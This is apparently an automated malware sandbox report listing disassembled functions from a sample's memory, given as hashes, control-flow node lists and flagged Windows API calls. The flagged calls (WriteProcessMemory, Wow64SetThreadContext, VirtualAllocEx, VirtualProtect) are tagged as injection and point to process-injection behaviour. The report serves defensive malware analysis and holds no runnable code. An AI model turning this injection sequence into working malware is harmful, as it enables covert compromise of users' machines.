                                                  • Instruction Fuzzy Hash: 136178B5E01658CFDB58CFAAC9446DDFBF2AF89300F14D0AAD409AB225DB345A85CF50
                                                  Function 00D2A3C8 Relevance: 1.0, Instructions: 1003COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630119771.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_d20000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7515b3f4682afd3d128ae1ba28b6b367e9e32cd6b4913997a3fa0a3448fc80f1
                                                  • Instruction ID: 1385428543e0bb506b65b9c3670fc6d30c843755df98f7dbc65085febd4436df
                                                  • Opcode Fuzzy Hash: 7515b3f4682afd3d128ae1ba28b6b367e9e32cd6b4913997a3fa0a3448fc80f1
                                                  • Instruction Fuzzy Hash: 9A924B74A002199FCB14CF6CE984AAABBF2FF58318F198555E409DB2A1D734EC81CB61
                                                  Function 05E7A794 Relevance: 1.0, Instructions: 1001COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2648003539.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e70000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7d433332f4c5f39796d6a078c3646493861923d9712b335a8ac4b793076d4963
                                                  • Instruction ID: 9c493199401af7a2c3bbc12a9d4e1225a1d2638fab24b352acab2e2016e6dd68
                                                  • Opcode Fuzzy Hash: 7d433332f4c5f39796d6a078c3646493861923d9712b335a8ac4b793076d4963
                                                  • Instruction Fuzzy Hash: 3272BF717002088FEB18EB78C858A6E7BA7FFC8350F158569E15ADB3A5DE30DD068791
                                                  Function 00D29778 Relevance: .9, Instructions: 895COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630119771.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_d20000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 32b1d16c6dee0e40a7ec65df5a420bf31bc182a38c42f50f5186400db6c4cdbd
                                                  • Instruction ID: e4c75cdc9fccf202aff7de5b0fffb1c7a729ab3580825e9ef060aca923f99726
                                                  • Opcode Fuzzy Hash: 32b1d16c6dee0e40a7ec65df5a420bf31bc182a38c42f50f5186400db6c4cdbd
                                                  • Instruction Fuzzy Hash: BD727C71A00219DFDB14DF69D994AAEBBF6FF98304F148169E805AB391DB30DC41CBA1
                                                  Function 05E72488 Relevance: .6, Instructions: 596COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2648003539.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e70000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 737c986f523554813f2c8d1dec62d07f6791e729e849a8990192a3c988b73ac4
                                                  • Instruction ID: 88c96a5d6bd69be3f2a3cbc2c892f3661ef8b17f673e9a9608a55f309e8e35a3
                                                  • Opcode Fuzzy Hash: 737c986f523554813f2c8d1dec62d07f6791e729e849a8990192a3c988b73ac4
                                                  • Instruction Fuzzy Hash: F0526F34A0035ACFDB14DF68C844B98B7B2FF85314F2582A9D5586F3A2DB71A986CF40
                                                  Function 05E72479 Relevance: .6, Instructions: 585COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2648003539.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e70000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 049c3b2f26c930fd52bf671bb4e0610d116e11fb8332767fb20b2ff8ca641b41
                                                  • Instruction ID: cad3073589b42ce5685e0c1cfbf0028874b198f5aa9cb33582002b31264a6e69
                                                  • Opcode Fuzzy Hash: 049c3b2f26c930fd52bf671bb4e0610d116e11fb8332767fb20b2ff8ca641b41
                                                  • Instruction Fuzzy Hash: 04526034A0035ACFDB14DF68C844B98B7B2FF85314F1582A9D5586F3A2DB71A986CF81
                                                  Function 0722B6F5 Relevance: .3, Instructions: 339COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2648869261.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7220000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b2ba9dea842405eeb94cf228386dee6838aa57b02a2355e88fa907bf82662cba
                                                  • Instruction ID: 16b1be3abca70556a8b78bcae8f492ce0d2cb206478e0326581c958b8aa2c998
                                                  • Opcode Fuzzy Hash: b2ba9dea842405eeb94cf228386dee6838aa57b02a2355e88fa907bf82662cba
                                                  • Instruction Fuzzy Hash: E8B1DAF0B3422BDBDB281F35945433A77A6AFC1A41F28491ED886D615CEE70C843EB55
                                                  Function 0918F338 Relevance: .3, Instructions: 336COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 43ad0bc4fe58c4e1d1ac7849c21c71b787d5c8e6f980f0818bb9a350a9fa4d2c
                                                  • Instruction ID: 2aebcb7bf5766304d6dbb981f2bfb8584c2137b53387a60fcb13c099a37ca438
                                                  • Opcode Fuzzy Hash: 43ad0bc4fe58c4e1d1ac7849c21c71b787d5c8e6f980f0818bb9a350a9fa4d2c
                                                  • Instruction Fuzzy Hash: 8AC19B71B006148BDB19EF75C464B6F77E6AF89708F20846DE1469B3A0CF35E902DBA1
                                                  Function 0732EBAA Relevance: .3, Instructions: 314COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649092254.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8d2f6cde45cbacd64ce9c8f582cd65966064c4a66c875e03d75863bdfae294d7
                                                  • Instruction ID: f00d10aa42e58730a3977b4d8ad87f06c4f1bd629a05f2cfc3cf000c0b6730ba
                                                  • Opcode Fuzzy Hash: 8d2f6cde45cbacd64ce9c8f582cd65966064c4a66c875e03d75863bdfae294d7
                                                  • Instruction Fuzzy Hash: 83D1AEB1D5422ADFEB04CFA5C4868EEFBB5FF8A340B248059D449AB355D730A942DF90
                                                  Function 091867EC Relevance: .3, Instructions: 293COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0314de48b943aef511c053abc4458bd6c27511db0372984de54e99409653941f
                                                  • Instruction ID: 24a1a964a85e96dbe63dc53ed145653f7ab0925b90677976ae049863db2dc016
                                                  • Opcode Fuzzy Hash: 0314de48b943aef511c053abc4458bd6c27511db0372984de54e99409653941f
                                                  • Instruction Fuzzy Hash: DFD11A75E0566ACFCB68DF25C84479EBBB6BB89384F10D5EAD40EA7214D7709E818F00
                                                  Function 0732EC4A Relevance: .3, Instructions: 280COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649092254.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 402e6c0ee8c2efea187ccc443b0ebce824c1810d8d953298048f9250878b0fda
                                                  • Instruction ID: ee820747879846c8e31cb66b5a5664e75f0e03f3eb929dca40c33c141d544716
                                                  • Opcode Fuzzy Hash: 402e6c0ee8c2efea187ccc443b0ebce824c1810d8d953298048f9250878b0fda
                                                  • Instruction Fuzzy Hash: 76C18BB0E5422ADFEB04CFA5C4868AEFBB6FF89340F548059D449AB355D734A942CF90
                                                  Function 0732EC60 Relevance: .3, Instructions: 278COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649092254.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 268c9fbd85463e0230032f41cc83a3dd8472485cfebb8c4d677a2a5076c92d79
                                                  • Instruction ID: d829dcc7f2bfc7fcbdbc066449f7856cd419121d1342d17fdb094d8a77093cea
                                                  • Opcode Fuzzy Hash: 268c9fbd85463e0230032f41cc83a3dd8472485cfebb8c4d677a2a5076c92d79
                                                  • Instruction Fuzzy Hash: D9C17AB0D5422ADFEB04CFA5C4868AEFBB6FF89340F648059D419AB355D734A942CF90
                                                  Function 0732CC49 Relevance: .2, Instructions: 179COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649092254.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2deecb7fc63e737eb9409a925f1ed98e798f85a32e0fea1ea0ed05148db59a4a
                                                  • Instruction ID: e2561eaf69b109d38dd011efabd0d6676cbf699423aaa922d794c3f33a11811e
                                                  • Opcode Fuzzy Hash: 2deecb7fc63e737eb9409a925f1ed98e798f85a32e0fea1ea0ed05148db59a4a
                                                  • Instruction Fuzzy Hash: 3D71D4B5E002188FDB08CFA9D985AEEBBB2FF89300F14912AD419AB355D7345906DF51
                                                  Function 0732CC58 Relevance: .2, Instructions: 177COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649092254.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e2d10c6bd527d9c764b56b57a060f287d1c34d1e2c2a267fe072bc38e50d2b28
                                                  • Instruction ID: 1b7fb4d8b541f07134b1384f5286d4e686daa9fe812e70bcc127f9b1196477b4
                                                  • Opcode Fuzzy Hash: e2d10c6bd527d9c764b56b57a060f287d1c34d1e2c2a267fe072bc38e50d2b28
                                                  • Instruction Fuzzy Hash: FE71C3B5E002198FDB08CFAAD984AAEFBB2FF89300F10912AD419AB354D7345906DF51
                                                  Function 09185B70 Relevance: .2, Instructions: 150COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0747794b1a2c0a7c4a1751d3fa0bba6f5573a16e17aa097a5100fbe6a59d0068
                                                  • Instruction ID: ad26489573e39ab30e96b581d0b497edf6c2c68d213cfc074f130c7162927a8c
                                                  • Opcode Fuzzy Hash: 0747794b1a2c0a7c4a1751d3fa0bba6f5573a16e17aa097a5100fbe6a59d0068
                                                  • Instruction Fuzzy Hash: 9A6148B0E04219DFCB08EFA5C5896EEBBB6FF88384F10846AE416A7340DB745A05DF54
                                                  Function 0732D380 Relevance: .1, Instructions: 148COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649092254.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e9b7f183f6e0b9382bdf4f1444e84eab3367caca4bc8616f41945ecc0ad00eaa
                                                  • Instruction ID: e3bce16d4e423f561c5005c710f4dbb989acb215462663226d39a1496ea245e1
                                                  • Opcode Fuzzy Hash: e9b7f183f6e0b9382bdf4f1444e84eab3367caca4bc8616f41945ecc0ad00eaa
                                                  • Instruction Fuzzy Hash: 5B5130B0E18219DFEB04CF9AC4416AEFBF2EF89341F24D06AD519A7255D7348A02CF94
                                                  Function 09185858 Relevance: .1, Instructions: 118COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2d50859abd489a7ada10ad6a5f7b411e7224aa63bb91fa54e3a04a60221b460a
                                                  • Instruction ID: 8dfa4ebf8d6c6198eba1eb5cc147f654477b4af11fac8dfae6b9136ad3c624bf
                                                  • Opcode Fuzzy Hash: 2d50859abd489a7ada10ad6a5f7b411e7224aa63bb91fa54e3a04a60221b460a
                                                  • Instruction Fuzzy Hash: 80416AB0E1520A9BCF08DFA6D8416AFBBF6FB89354F10946AE511A6210D73446428FA1
                                                  Function 09185868 Relevance: .1, Instructions: 118COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3bcf9771bd14a0401df3d25e23f01b64a5252c881801c9c6c626bdc44fb8ee20
                                                  • Instruction ID: 9a0add2f2b0b097245396f9cd5147331a323410fa49eb3b13911d232d7b56cbb
                                                  • Opcode Fuzzy Hash: 3bcf9771bd14a0401df3d25e23f01b64a5252c881801c9c6c626bdc44fb8ee20
                                                  • Instruction Fuzzy Hash: DF4158B0E1520ADBDF08DFA6C8416AFFBF6FF89354F10946AE511B6210D73446428FA5
                                                  Function 0732DD50 Relevance: .1, Instructions: 79COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649092254.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b4008b753b9cdf8c751c1d61e6f8ca223f89c00cb85cfb744486ba384b8258ae
                                                  • Instruction ID: 9122bd3ee0a41446a669e8f6f4cf7966cd1f932477fef8ffca4da32132fb1b70
                                                  • Opcode Fuzzy Hash: b4008b753b9cdf8c751c1d61e6f8ca223f89c00cb85cfb744486ba384b8258ae
                                                  • Instruction Fuzzy Hash: 8F31E7B1E106288BEB28CF96D9443DEFFF6AFC9310F14C16AD409A6254DB750A4ACF50
                                                  Function 0731A6E8 Relevance: 1.7, Strings: 1, Instructions: 446COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 4854 731a6e8-731a894 4879 731a896-731a8a0 4854->4879 4880 731a8a8-731a960 4854->4880 4879->4880 4892 731a962-731a965 4880->4892 4893 731a967-731a96a 4880->4893 4894 731a96d-731a980 4892->4894 4893->4894 4933 731a983 call 731ac51 4894->4933 4934 731a983 call 731c4d3 4894->4934 4897 731a989-731ab1e call 7319930 4922 731ab20-731ab3a 4897->4922 4923 731ab48-731abca 4897->4923 4935 731ab3a call 7320b58 4922->4935 4936 731ab3a call 7320b48 4922->4936 4931 731ac29-731ac43 4923->4931 4932 731abcc-731abe6 4923->4932 4930 731ab40-731ab47 4933->4897 4934->4897 4935->4930 4936->4930
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649034695.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7310000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: d7e7885ba1be2ac8e1afe6023e3023a9abd3ffdadde48d0c6ed432d32dfca3e1
                                                  • Instruction ID: f2bc0cbe20d7b4a4d3812917d676bb42eddf148f4c259344b03aec32f3d24499
                                                  • Opcode Fuzzy Hash: d7e7885ba1be2ac8e1afe6023e3023a9abd3ffdadde48d0c6ed432d32dfca3e1
                                                  • Instruction Fuzzy Hash: 23D1D370B163448FC709FBB8E89966D7BF2EF89300F4185A9E445DB3A1DE389849CB51
                                                  Function 0918D9E0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 4971 918d9e0-918da2e 4973 918da3e-918da7d WriteProcessMemory 4971->4973 4974 918da30-918da3c 4971->4974 4976 918da7f-918da85 4973->4976 4977 918da86-918dab6 4973->4977 4974->4973 4976->4977
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0918DA70
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: 65d28387ac85b7d0e5431c237d79bea6459691730a8544e3d3d9e900964a50c8
                                                  • Instruction ID: 58aaab4be398902dd1864cffc817c6037660a346462fa0c24f49a3fcd1f003e8
                                                  • Opcode Fuzzy Hash: 65d28387ac85b7d0e5431c237d79bea6459691730a8544e3d3d9e900964a50c8
                                                  • Instruction Fuzzy Hash: 8A2133759003099FDB10DFA9C881BEEBBF5FF48314F14842AE919A7280C7789A40DBA4
                                                  Function 0918E160 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 4991 918e160-918e1ab 4993 918e1bb-918e1eb Wow64SetThreadContext 4991->4993 4994 918e1ad-918e1b9 4991->4994 4996 918e1ed-918e1f3 4993->4996 4997 918e1f4-918e224 4993->4997 4994->4993 4996->4997
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0918E1DE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: e61ca77484121b9f7c1643469dd83227373d17517cce39adbc8bfebcbb038cef
                                                  • Instruction ID: 23eaf21b264a9e1b1e56a545d4324d16de32921ce1faa0d801160a18f23d0f70
                                                  • Opcode Fuzzy Hash: e61ca77484121b9f7c1643469dd83227373d17517cce39adbc8bfebcbb038cef
                                                  • Instruction Fuzzy Hash: 30211871D003098FEB10DFAAC485BEEBBF4EF88724F148429D559A7240CB789944CFA5
                                                  Function 0918CF98 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 4981 918cf98-918cfe3 4983 918cff3-918d023 Wow64GetThreadContext 4981->4983 4984 918cfe5-918cff1 4981->4984 4986 918d02c-918d05c 4983->4986 4987 918d025-918d02b 4983->4987 4984->4983 4987->4986
                                                  APIs
                                                  • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0918D016
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 20f8f33c303639de0983b25ba4b249144565bddbf1cb6e8d7cb18f5d27968739
                                                  • Instruction ID: 7a5487d5d112ad5bda2cba93fa373ef362a16f5f94f91fb76bfc59a4034ad241
                                                  • Opcode Fuzzy Hash: 20f8f33c303639de0983b25ba4b249144565bddbf1cb6e8d7cb18f5d27968739
                                                  • Instruction Fuzzy Hash: F8213871D003098FEB10DFAAC4857EEBBF4EF88324F148429D559A7280CB789944CFA4
                                                  Function 0918DED8 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 0918DF4F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: a48963d17d677b4d9ad8c3eb6f545a249bea7c059919f3ba76df0df45f3eb104
                                                  • Instruction ID: 91872b3d1beaa3d89b383b40f3c64268826aee966f2f2f4d308f9c27c3f904d1
                                                  • Opcode Fuzzy Hash: a48963d17d677b4d9ad8c3eb6f545a249bea7c059919f3ba76df0df45f3eb104
                                                  • Instruction Fuzzy Hash: C1213871C003099FEB10DFAAC445BEEBBF4EF48320F148429E519A7250C7789540DFA4
                                                  Function 09183FF0 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0918406B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: f682bb82ef4d403a395e13b9dd05bec60fc899e5c08b232236526737a048547a
                                                  • Instruction ID: 5b64baef68ab7ee4adb286580b230edc1ae3ee8c21cb0a480933382e6390b5bb
                                                  • Opcode Fuzzy Hash: f682bb82ef4d403a395e13b9dd05bec60fc899e5c08b232236526737a048547a
                                                  • Instruction Fuzzy Hash: 98213671D0024A8FDB10CF9AC584BDEFBF4AF48324F10802AE458A7251C378A644DFA0
                                                  Function 07229660 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DeleteFileW.KERNELBASE(00000000), ref: 072296D0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2648869261.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7220000_file.jbxd
                                                  Similarity
                                                  • API ID: DeleteFile
                                                  • String ID:
                                                  • API String ID: 4033686569-0
                                                  • Opcode ID: 1d7eca76c523369b9234bced0555b3a0a80dfa0f74b02163ab47b8870dad640f
                                                  • Instruction ID: d9621b705f45fe9929fa7fa843716c2acb8685503dd73923246ca31dad5f3588
                                                  • Opcode Fuzzy Hash: 1d7eca76c523369b9234bced0555b3a0a80dfa0f74b02163ab47b8870dad640f
                                                  • Instruction Fuzzy Hash: A41136B1C0062A9BDB10CF9AC444BAEFBF4BF48720F14812AD858B7240D738A940CFE5
                                                  Function 0732BF68 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0732BFDB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649092254.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 633a9a7b793c6637ddf57d2c987966a383a933ab9a2efa4bad362db639c94175
                                                  • Instruction ID: 03a6c799a19882d511c207d9689149f6fa9f432982c45555ca6adbfac84fb072
                                                  • Opcode Fuzzy Hash: 633a9a7b793c6637ddf57d2c987966a383a933ab9a2efa4bad362db639c94175
                                                  • Instruction Fuzzy Hash: 7121E4B590065A9FDB10CF9AC484BDEFBF4FB48320F108429E958A7250D378A644DFA5
                                                  Function 09183FF8 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0918406B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: bbb18136db239d08191a436d36bad5120ec2a58ae3cdad6ec92b4a1132df35f9
                                                  • Instruction ID: a7a7b9e73bf6bab71d0dd869c907af94a2b0fb7ca943c528703ce995c739ca9b
                                                  • Opcode Fuzzy Hash: bbb18136db239d08191a436d36bad5120ec2a58ae3cdad6ec92b4a1132df35f9
                                                  • Instruction Fuzzy Hash: AE2103B1D002499FDB10DF9AC984BDEFBF4EF48324F108029E958A7250D378A644CFA5
                                                  Function 0918D668 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0918D6D6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 4368938d83f70228aa70c29335ccbdc614559220166bcfee6a6ee4b58211ab57
                                                  • Instruction ID: 69f7cfc5e9ddeee820e5412cab60f33338c8b3f631a0b790d55a80340ea9a824
                                                  • Opcode Fuzzy Hash: 4368938d83f70228aa70c29335ccbdc614559220166bcfee6a6ee4b58211ab57
                                                  • Instruction Fuzzy Hash: EB1156719003499FDB10DFAAC845BDFBBF5EF88324F248419E519A7250C7759540CFA4
                                                  Function 00DA09C9 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 00DA0A28
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630249769.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_da0000_file.jbxd
                                                  Similarity
                                                  • API ID: ChangeCloseFindNotification
                                                  • String ID:
                                                  • API String ID: 2591292051-0
                                                  • Opcode ID: 777621331a2312677d52362e974f5b156cdf07a3c329faec62a4277e0c255f04
                                                  • Instruction ID: 2e1ee21a74d040ba78fd7ca4ba26f23eb88493c8722bc9c8a65734929029bc96
                                                  • Opcode Fuzzy Hash: 777621331a2312677d52362e974f5b156cdf07a3c329faec62a4277e0c255f04
